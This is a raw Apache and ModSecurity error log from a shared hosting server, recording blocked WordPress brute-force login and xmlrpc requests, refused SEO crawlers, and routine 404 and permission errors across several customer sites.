[Tue May 26 18:28:34.542219 2026] [security2:error] [pid 998632:tid 998824] [client 124.43.5.103:61808] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWY-q1OTU2dW0MS1Em5igAAACA"]
[Tue May 26 18:28:34.748960 2026] [core:crit] [pid 998632:tid 998849] (13)Permission denied: [client 207.46.13.128:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:28:36.320538 2026] [security2:error] [pid 998632:tid 998896] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY-q1OTU2dW0MS1Em5mgAAAGM"]
[Tue May 26 18:28:39.221821 2026] [security2:error] [pid 998632:tid 998894] [client 94.26.106.23:59455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-login.php"] [unique_id "ahWY_q1OTU2dW0MS1Em59wAAAGE"]
[Tue May 26 18:28:39.456770 2026] [security2:error] [pid 998632:tid 998898] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY_a1OTU2dW0MS1Em51AAAAGU"]
[Tue May 26 18:28:39.538526 2026] [security2:error] [pid 998632:tid 998838] [client 94.26.106.23:59661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-login.php"] [unique_id "ahWY_61OTU2dW0MS1Em6BAAAACw"], referer: https://wordpress.org/
[Tue May 26 18:28:41.599905 2026] [security2:error] [pid 998632:tid 998745] [remote 103.91.67.202:47050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWZAa1OTU2dW0MS1Em6MwAAGVk"]
[Tue May 26 18:28:42.554179 2026] [security2:error] [pid 998632:tid 998922] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZAK1OTU2dW0MS1Em6GAAAAH0"]
[Tue May 26 18:28:43.750311 2026] [security2:error] [pid 998632:tid 998905] [client 66.249.64.161:63264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWY_61OTU2dW0MS1Em6FAAAAGw"], referer: http://doyecpa.com/prizes/47456713%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 18:28:43.768559 2026] [security2:error] [pid 998632:tid 998767] [remote 51.222.168.211:22760] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWZA61OTU2dW0MS1Em6UAAAMmw"]
[Tue May 26 18:28:43.768714 2026] [security2:error] [pid 998632:tid 998844] [client 51.222.168.211:22760] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWZA61OTU2dW0MS1Em6UAAAMmw"]
[Tue May 26 18:28:44.758141 2026] [security2:error] [pid 998632:tid 998746] [remote 209.38.221.42:38538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.221.38.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZBK1OTU2dW0MS1Em6XQAAGFo"]
[Tue May 26 18:28:44.871908 2026] [security2:error] [pid 998632:tid 998880] [client 124.43.5.103:62072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZBK1OTU2dW0MS1Em6ZAAAAFU"]
[Tue May 26 18:28:44.872252 2026] [security2:error] [pid 998632:tid 998880] [client 124.43.5.103:62072] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZBK1OTU2dW0MS1Em6ZAAAAFU"]
[Tue May 26 18:28:45.199459 2026] [security2:error] [pid 998632:tid 998730] [remote 142.44.228.117:32342] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.anujtradingco.com"] [uri "/"] [unique_id "ahWZBa1OTU2dW0MS1Em6agAAVko"]
[Tue May 26 18:28:45.199599 2026] [security2:error] [pid 998632:tid 998881] [client 142.44.228.117:32342] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/"] [unique_id "ahWZBa1OTU2dW0MS1Em6agAAVko"]
[Tue May 26 18:28:46.123984 2026] [security2:error] [pid 998632:tid 998874] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZA61OTU2dW0MS1Em6RgAAAE8"]
[Tue May 26 18:28:48.870315 2026] [security2:error] [pid 998632:tid 998910] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZBa1OTU2dW0MS1Em6cQAAAHE"]
[Tue May 26 18:28:51.272759 2026] [security2:error] [pid 998632:tid 998673] [remote 91.134.89.60:60546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZC61OTU2dW0MS1Em66QAAbhQ"]
[Tue May 26 18:28:54.128717 2026] [security2:error] [pid 998632:tid 998850] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZC61OTU2dW0MS1Em67wAAADg"]
[Tue May 26 18:28:54.539945 2026] [security2:error] [pid 998632:tid 998801] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZC61OTU2dW0MS1Em6-AAAAAo"]
[Tue May 26 18:28:55.786841 2026] [security2:error] [pid 998632:tid 998798] [client 124.43.5.103:2660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZD61OTU2dW0MS1Em7YgAAAAc"]
[Tue May 26 18:28:55.787021 2026] [security2:error] [pid 998632:tid 998798] [client 124.43.5.103:2660] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZD61OTU2dW0MS1Em7YgAAAAc"]
[Tue May 26 18:28:56.149823 2026] [security2:error] [pid 998632:tid 998706] [remote 51.91.98.45:54802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWZD61OTU2dW0MS1Em7ZgAAOjI"]
[Tue May 26 18:28:56.693752 2026] [security2:error] [pid 998632:tid 998837] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZDq1OTU2dW0MS1Em7LwAAACs"]
[Tue May 26 18:28:58.013690 2026] [security2:error] [pid 998632:tid 998749] [remote 74.208.170.33:59694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.170.208.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWZEa1OTU2dW0MS1Em7kwAARV0"]
[Tue May 26 18:28:59.160850 2026] [security2:error] [pid 998632:tid 998878] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZEK1OTU2dW0MS1Em7ewAAAFM"]
[Tue May 26 18:29:00.597064 2026] [security2:error] [pid 998632:tid 998907] [client 185.191.171.16:35438] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWZFK1OTU2dW0MS1Em76AAAAG4"]
[Tue May 26 18:29:00.597200 2026] [security2:error] [pid 998632:tid 998907] [client 185.191.171.16:35438] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWZFK1OTU2dW0MS1Em76AAAAG4"]
[Tue May 26 18:29:02.339694 2026] [security2:error] [pid 998632:tid 998810] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZE61OTU2dW0MS1Em74AAAABM"]
[Tue May 26 18:29:04.398555 2026] [security2:error] [pid 998632:tid 998793] [client 171.7.236.99:49796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.236.7.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWZF61OTU2dW0MS1Em8MgAAAAI"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 18:29:04.398737 2026] [security2:error] [pid 998632:tid 998793] [client 171.7.236.99:49796] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWZF61OTU2dW0MS1Em8MgAAAAI"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 18:29:04.589561 2026] [security2:error] [pid 998632:tid 998779] [remote 123.30.233.13:60592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWZGK1OTU2dW0MS1Em8OQAABHg"]
[Tue May 26 18:29:05.023498 2026] [security2:error] [pid 998632:tid 998896] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZFq1OTU2dW0MS1Em8GQAAAGM"]
[Tue May 26 18:29:05.652525 2026] [security2:error] [pid 998632:tid 998820] [client 171.7.236.99:36045] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWZGa1OTU2dW0MS1Em8UgAAABw"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 18:29:05.977823 2026] [security2:error] [pid 998632:tid 998859] [client 192.241.101.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZGa1OTU2dW0MS1Em8XAAAAEE"], referer: https://www.anujtradingco.com/
[Tue May 26 18:29:06.456084 2026] [security2:error] [pid 998632:tid 998806] [client 192.241.101.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZGq1OTU2dW0MS1Em8agAAAA8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1214858&moderation-hash=85086b9c615dd443230e63e7865eeeb4
[Tue May 26 18:29:06.562386 2026] [autoindex:error] [pid 998632:tid 998922] [client 66.132.172.108:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:29:06.670289 2026] [security2:error] [pid 998632:tid 998825] [client 124.43.5.103:5379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZGq1OTU2dW0MS1Em8bAAAACE"]
[Tue May 26 18:29:06.670479 2026] [security2:error] [pid 998632:tid 998825] [client 124.43.5.103:5379] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZGq1OTU2dW0MS1Em8bAAAACE"]
[Tue May 26 18:29:07.488931 2026] [security2:error] [pid 998632:tid 998799] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZGK1OTU2dW0MS1Em8SAAAAAg"]
[Tue May 26 18:29:08.645167 2026] [security2:error] [pid 998632:tid 998849] [client 192.241.101.7:57982] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWZG61OTU2dW0MS1Em8hwAAADc"], referer: https://anujtradingco.com
[Tue May 26 18:29:09.558337 2026] [security2:error] [pid 998632:tid 998842] [client 136.243.228.177:45878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWZHa1OTU2dW0MS1Em8sAAAADA"]
[Tue May 26 18:29:10.457988 2026] [security2:error] [pid 998632:tid 998905] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZG61OTU2dW0MS1Em8iAAAAGw"]
[Tue May 26 18:29:10.857716 2026] [security2:error] [pid 998632:tid 998832] [client 103.97.84.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZHK1OTU2dW0MS1Em8kQAAACc"]
[Tue May 26 18:29:13.251381 2026] [security2:error] [pid 998632:tid 998888] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZHq1OTU2dW0MS1Em8yQAAAFs"]
[Tue May 26 18:29:13.499191 2026] [security2:error] [pid 998632:tid 998704] [remote 54.38.29.86:44920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWZIa1OTU2dW0MS1Em8_wAAazA"]
[Tue May 26 18:29:14.915294 2026] [security2:error] [pid 998632:tid 998717] [remote 54.38.29.86:44920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWZIq1OTU2dW0MS1Em9GQAAVz0"], referer: https://theafterglow-centre.com/wp-login.php
[Tue May 26 18:29:15.015673 2026] [security2:error] [pid 998632:tid 998884] [client 205.178.191.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWZIq1OTU2dW0MS1Em9CwAAWDI"]
[Tue May 26 18:29:15.131603 2026] [security2:error] [pid 998632:tid 998847] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZIK1OTU2dW0MS1Em88AAAADU"]
[Tue May 26 18:29:15.463711 2026] [security2:error] [pid 998632:tid 998822] [client 205.178.191.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWZIq1OTU2dW0MS1Em9CgAAHms"]
[Tue May 26 18:29:16.373904 2026] [core:crit] [pid 998632:tid 998799] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:29:16.504400 2026] [security2:error] [pid 998632:tid 998730] [remote 64.22.104.200:35572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZJK1OTU2dW0MS1Em9LAAABko"]
[Tue May 26 18:29:16.727514 2026] [security2:error] [pid 998632:tid 998750] [remote 64.22.104.200:35572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZJK1OTU2dW0MS1Em9NAAAAV4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:29:17.040015 2026] [core:crit] [pid 998632:tid 998846] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:29:17.434178 2026] [security2:error] [pid 998632:tid 998802] [client 124.43.5.103:5843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZJa1OTU2dW0MS1Em9RwAAAAs"]
[Tue May 26 18:29:17.434315 2026] [security2:error] [pid 998632:tid 998802] [client 124.43.5.103:5843] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZJa1OTU2dW0MS1Em9RwAAAAs"]
[Tue May 26 18:29:18.995298 2026] [security2:error] [pid 998632:tid 998880] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZI61OTU2dW0MS1Em9JAAAAFU"]
[Tue May 26 18:29:20.398052 2026] [security2:error] [pid 998632:tid 998890] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZJq1OTU2dW0MS1Em9UgAAAF0"]
[Tue May 26 18:29:21.684825 2026] [security2:error] [pid 998632:tid 998663] [remote 38.95.35.74:57810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWZKa1OTU2dW0MS1Em9nwAAAws"]
[Tue May 26 18:29:22.539618 2026] [security2:error] [pid 998632:tid 998915] [client 138.219.122.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZKq1OTU2dW0MS1Em9uQAAAHY"], referer: https://anujtradingco.com
[Tue May 26 18:29:22.698653 2026] [security2:error] [pid 998632:tid 998752] [remote 38.95.35.74:57810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWZKq1OTU2dW0MS1Em9vQAASmA"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:29:22.748261 2026] [security2:error] [pid 998632:tid 998845] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZKa1OTU2dW0MS1Em9nAAAADM"]
[Tue May 26 18:29:25.156868 2026] [security2:error] [pid 998632:tid 998839] [client 106.222.227.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWZLa1OTU2dW0MS1Em99wAAAC0"]
